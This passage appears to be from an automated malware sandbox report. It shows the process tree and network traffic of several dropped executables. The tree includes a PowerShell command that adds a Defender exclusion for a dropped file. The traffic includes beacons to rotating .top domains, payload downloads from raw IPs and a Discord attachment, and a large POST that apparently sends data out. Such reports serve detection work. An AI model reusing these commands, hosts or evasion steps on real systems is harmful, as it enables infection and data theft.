      command line: "C:\Users\Admin\AppData\Local\Temp\9dac25bf-828f-494e-be2f-32046ec357c3\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\9dac25bf-828f-494e-be2f-32046ec357c3\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2328
    [3] C:\Users\Admin\AppData\Local\Temp\9dac25bf-828f-494e-be2f-32046ec357c3\AdvancedRun.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\9dac25bf-828f-494e-be2f-32046ec357c3\AdvancedRun.exe" /SpecialRun 4101d8 2328
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
        PID: 3920
  [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\17A2.exe" -Force
      - Suspicious use of AdjustPrivilegeToken
      PID: 3840
  [2] C:\Users\Admin\AppData\Local\Temp\17A2.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\17A2.exe"
      - Executes dropped EXE
      PID: 2360
  [2] C:\Users\Admin\AppData\Local\Temp\17A2.exe
      command line: "C:\Users\Admin\AppData\Local\Temp\17A2.exe"
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      PID: 2512
  [2] C:\Windows\SysWOW64\WerFault.exe
      command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 2200
      - Drops file in Windows directory
      - Program crash
      - Suspicious use of AdjustPrivilegeToken
      PID: 2240
[1] C:\Users\Admin\AppData\Local\Temp\4952.exe
    command line: C:\Users\Admin\AppData\Local\Temp\4952.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates connected drives
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 2468
  [2] C:\Windows\SysWOW64\msiexec.exe
      command line: "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management 1.7.3.2\install\97C955F\adv.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4952.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632871995 " AI_EUIMSI=""
      - Enumerates connected drives
      - Suspicious use of FindShellTrayWindow
      PID: 4648
[1] C:\Windows\system32\msiexec.exe
    command line: C:\Windows\system32\msiexec.exe /V
    - Enumerates connected drives
    - Drops file in Windows directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 4276
  [2] C:\Windows\syswow64\MsiExec.exe
      command line: C:\Windows\syswow64\MsiExec.exe -Embedding 3EEAA976552A483B3E3EF6D886ECBA20 C
      - Loads dropped DLL
      PID: 4444
  [2] C:\Windows\syswow64\MsiExec.exe
      command line: C:\Windows\syswow64\MsiExec.exe -Embedding 174C41CFE0FB8E18375AF88AF883D32B
      - Loads dropped DLL
      PID: 4936
  [2] C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe
      command line: "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management\disksyncer.exe"
      - Executes dropped EXE
      - Drops startup file
      - Loads dropped DLL
      - Adds Run key to start application
      PID: 4388
    [3] C:\ProgramData\Zenar_protected\Zenar_protected.exe
        command line: "C:\ProgramData\Zenar_protected\Zenar_protected.exe"
        - Executes dropped EXE
        - Checks BIOS information in registry
        - Checks whether UAC is enabled
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        PID: 2892
[1] C:\Users\Admin\AppData\Local\Temp\6528.exe
    command line: C:\Users\Admin\AppData\Local\Temp\6528.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID: 4112
  [2] C:\Users\Admin\AppData\Local\Temp\is-621I7.tmp\6528.tmp
      command line: "C:\Users\Admin\AppData\Local\Temp\is-621I7.tmp\6528.tmp" /SL5="$80118,4844586,831488,C:\Users\Admin\AppData\Local\Temp\6528.exe"
      - Executes dropped EXE
      PID: 4148
    [3] C:\Users\Admin\AppData\Local\Temp\6528.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\6528.exe" /VERYSILENT
        - Executes dropped EXE
        PID: 4320
      [4] C:\Users\Admin\AppData\Local\Temp\is-8L012.tmp\6528.tmp
          command line: "C:\Users\Admin\AppData\Local\Temp\is-8L012.tmp\6528.tmp" /SL5="$90118,4844586,831488,C:\Users\Admin\AppData\Local\Temp\6528.exe" /VERYSILENT
          - Executes dropped EXE
          - Suspicious use of FindShellTrayWindow
          PID: 4408
        [5] C:\Users\Admin\AppData\Roaming\SketchLib SDK Client\SketchClient.exe
            command line: "C:\Users\Admin\AppData\Roaming\SketchLib SDK Client\SketchClient.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            PID: 4920
Network
-
Remote address: 8.8.8.8:53
Request: naghenrietti1.top IN A
Response: (none)
-
Remote address: 8.8.8.8:53
Request: kimballiett2.top IN A
Response: (none)
-
Remote address: 8.8.8.8:53
Request: xadriettany3.top IN A
Response: (none)
-
Remote address: 8.8.8.8:53
Request: jebeccallis4.top IN A
Response: (none)
-
Remote address: 8.8.8.8:53
Request: nityanneron5.top IN A
Response: (none)
-
Remote address: 8.8.8.8:53
Request: umayaniela6.top IN A
Response: (none)
-
Remote address: 8.8.8.8:53
Request: umayaniela6.top IN A
Response: (none)
-
Remote address: 8.8.8.8:53
Request: lynettaram7.top IN A
Response: (none)
-
Remote address: 8.8.8.8:53
Request: sadineyalas8.top IN A
Response: (none)
-
Remote address: 8.8.8.8:53
Request: geenaldencia9.top IN A
Response: geenaldencia9.top IN A 47.251.11.148
-
Remote address: 47.251.11.148:80
Request:
POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 219
Host: geenaldencia9.top
Response:
HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 25
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request:
POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 323
Host: geenaldencia9.top
Response:
HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 204
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 311
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 356
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 172
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 334
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 342
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 309
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 226
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address: 8.8.8.8:53
Request: cdn.discordapp.com IN A
Response: cdn.discordapp.com IN A 162.159.134.233, 162.159.129.233, 162.159.130.233, 162.159.133.233, 162.159.135.233
-
GET https://cdn.discordapp.com/attachments/886962207051640872/892436136616689684/0368F3CF.jpg (process: 17A2.exe)
Remote address: 162.159.134.233:443
Request: GET /attachments/886962207051640872/892436136616689684/0368F3CF.jpg HTTP/1.1
Host: cdn.discordapp.com
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Content-Type: image/jpeg
Content-Length: 1449980
Connection: keep-alive
CF-Ray: 6960cb931ec16b32-AMS
Accept-Ranges: bytes
Age: 28030
Cache-Control: public, max-age=31536000
ETag: "397bff800f59b6dca0f183f5ba302d93"
Expires: Wed, 28 Sep 2022 23:36:40 GMT
Last-Modified: Tue, 28 Sep 2021 15:42:35 GMT
Vary: Accept-Encoding
CF-Cache-Status: HIT
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Cf-Bgj: h2pri
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
x-goog-generation: 1632843755681147
x-goog-hash: crc32c=7lEwbA==
x-goog-hash: md5=OXv/gA9Zttyg8YP1ujAtkw==
x-goog-metageneration: 1
x-goog-storage-class: STANDARD
x-goog-stored-content-encoding: identity
x-goog-stored-content-length: 1449980
X-GUploader-UploadID: ADPycdtWxrscpbCnfvZ40OQEIMqgtjas3yTSWgV_IwZEWsafMEcmP0yP9ldzXyxBd3zqlfz83oXwEa3WanahmZ2xKcMeC4stHg
X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vwxlCzvkDwF1981muB%2BIN2WqjgADlwg61Y9TlVLlO6aJV1Ot1VfFxqjLahCMLYEYQ1KAyzwYEevCC058%2BdpRbbwSH%2F63OAY3FdqdPKOHMS1ClyAYFJ2UO9JUJiloXGKlhqn%2BDA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 204
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 283
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address: 8.8.8.8:53
Request: api.ip.sb IN A
Response: api.ip.sb IN CNAME api.ip.sb.cdn.cloudflare.net; api.ip.sb.cdn.cloudflare.net IN A 104.26.12.31, 104.26.13.31, 172.67.75.172
-
Remote address: 104.26.12.31:443
Request: GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vaHQ0dJ9ok%2BXvwXWkwp1rPTlppRnj6JiNT%2BaapREjIH6cUWyLmeW%2FFBsaYRj3M27nXka94BZXXR0SW0bocrbSGLSxDF6PCSDSxzHZ6%2FUqHJZQ5ca6M496niZHw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 6960cb9b1acc1ead-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 174
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
-
Remote address: 104.26.12.31:443
Request: GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pZGQwlkU2aj0IjUEVwadYkiJhkkVtsRJ1NCqwBB4c52nmnQKQ5GKPBgI%2FsjXWGmurEJj31%2FYfD%2FhFBdhYvDRe2Ae86KUUEX%2B326n2ajFigDK0O1n5homDUY%2FPg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 6960cbe06eab6b32-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 218
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 362
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 352
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 222
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 156
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 327
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request: POST / HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://geenaldencia9.top/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 213
Host: geenaldencia9.top
Response: HTTP/1.1 404 Not Found
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
X-Powered-By: PHP/5.5.38
Content-Length: 47
Connection: close
Content-Type: text/html; charset=utf-8
-
Remote address: 47.251.11.148:80
Request: GET /raccon.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: geenaldencia9.top
Response: HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
Last-Modified: Tue, 28 Sep 2021 23:37:01 GMT
ETag: W/"0-5cd16b0bec9f9"
Accept-Ranges: bytes
Content-Length: 0
Connection: close
Content-Type: application/octet-stream
-
Remote address: 185.215.113.13:80
Request: POST /g4MbvE/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.13
Content-Length: 84
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 58
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.215.113.13:80
Request: POST /g4MbvE/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----21f48c9c53ebdee82c20134be0aa40fa
Host: 185.215.113.13
Content-Length: 77205
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
-
Remote address: 185.215.113.36:80
Request: GET /Zenar_protected.exe HTTP/1.1
Host: 185.215.113.36
Response: HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 23:37:49 GMT
Content-Type: application/x-msdos-program
Content-Length: 8643584
Connection: keep-alive
Last-Modified: Tue, 28 Sep 2021 23:33:33 GMT
ETag: "83e400-5cd16a453a6a0"
Accept-Ranges: bytes
-
Remote address: 104.26.12.31:443
Request: GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 285
Connection: keep-alive
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X78sqLOzVtXwxnLgkLVAF%2FCF7XtcJgwci9Qh%2Bd6TXJK%2FnJmNmWq%2F86iEjYRpPtmSHfmUHkl6MTVih7cmVhFR6yhlo0YhtJ8Ux2CVCB0fvC46dT7Ku4OkUMhGng%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 6960cd50cc800b37-AMS
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
-
Remote address: 185.215.113.36:80
Request: GET /zena/UpSys.exe HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 185.215.113.36
Connection: Keep-Alive
Response: HTTP/1.1 200 OK
Date: Tue, 28 Sep 2021 23:38:32 GMT
Content-Type: application/x-msdos-program
Content-Length: 945944
Connection: keep-alive
Last-Modified: Tue, 28 Sep 2021 17:10:15 GMT
ETag: "e6f18-5cd1149915f1f"
Accept-Ranges: bytes
-
Remote address: 185.215.113.13:80
Request: POST /g4MbvE/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.13
Content-Length: 31
Cache-Control: no-cache
Response: HTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
-
764 B 523 B 6 6
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
868 B 826 B 6 6
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
40.7kB 2.6MB 874 1720
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
856 B 826 B 6 6
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
901 B 826 B 6 6
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
71.4kB 4.5MB 1542 3043
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
1.8MB 26.5kB 1214 465
-
879 B 786 B 6 5
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
887 B 826 B 6 6
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
2.0kB 77.8kB 32 56
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
771 B 826 B 6 6
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
162.159.134.233:443 https://cdn.discordapp.com/attachments/886962207051640872/892436136616689684/0368F3CF.jpg tls, http 17A2.exe 24.2kB 1.5MB 517 1020
HTTP Request
GET https://cdn.discordapp.com/attachments/886962207051640872/892436136616689684/0368F3CF.jpg HTTP Response
200 -
749 B 826 B 6 6
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
828 B 826 B 6 6
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
707 B 4.3kB 8 8
HTTP Request
GET https://api.ip.sb/geoip HTTP Response
200 -
122.5kB 7.7MB 2653 5193
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
1.7MB 19.9kB 1197 273
-
707 B 4.3kB 8 8
HTTP Request
GET https://api.ip.sb/geoip HTTP Response
200 -
763 B 826 B 6 6
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
907 B 746 B 6 4
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
897 B 786 B 6 5
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
91.4kB 5.9MB 1977 3915
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
701 B 826 B 6 6
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
758 B 505 B 6 5
HTTP Request
POST http://geenaldencia9.top/ HTTP Response
404 -
395 B 519 B 5 5
HTTP Request
GET http://geenaldencia9.top/raccon.exe HTTP Response
200 -
649 B 378 B 9 4
HTTP Request
POST http://185.215.113.13/g4MbvE/index.php HTTP Response
200 -
80.1kB 1.2kB 65 25
HTTP Request
POST http://185.215.113.13/g4MbvE/index.php?scr=1 HTTP Response
200 -
289.2kB 8.9MB 5934 5930
HTTP Request
GET http://185.215.113.36/Zenar_protected.exe HTTP Response
200 -
1.3MB 14.9kB 926 178
-
707 B 4.3kB 8 8
HTTP Request
GET https://api.ip.sb/geoip HTTP Response
200 -
2.7kB 66.1kB 48 46
HTTP Request
GET http://185.215.113.36/zena/UpSys.exe HTTP Response
200 -
366 B 279 B 4 3
HTTP Request
POST http://185.215.113.13/g4MbvE/index.php HTTP Response
200
-
63 B 133 B 1 1
DNS Request
naghenrietti1.top
-
62 B 132 B 1 1
DNS Request
kimballiett2.top
-
62 B 132 B 1 1
DNS Request
xadriettany3.top
-
62 B 132 B 1 1
DNS Request
jebeccallis4.top
-
62 B 132 B 1 1
DNS Request
nityanneron5.top
-
122 B 122 B 2 2
DNS Request
umayaniela6.top
DNS Request
umayaniela6.top
-
61 B 131 B 1 1
DNS Request
lynettaram7.top
-
62 B 132 B 1 1
DNS Request
sadineyalas8.top
-
63 B 79 B 1 1
DNS Request
geenaldencia9.top
DNS Response
47.251.11.148
-
64 B 144 B 1 1
DNS Request
cdn.discordapp.com
DNS Response
162.159.134.233, 162.159.129.233, 162.159.130.233, 162.159.133.233, 162.159.135.233
-
55 B 145 B 1 1
DNS Request
api.ip.sb
DNS Response
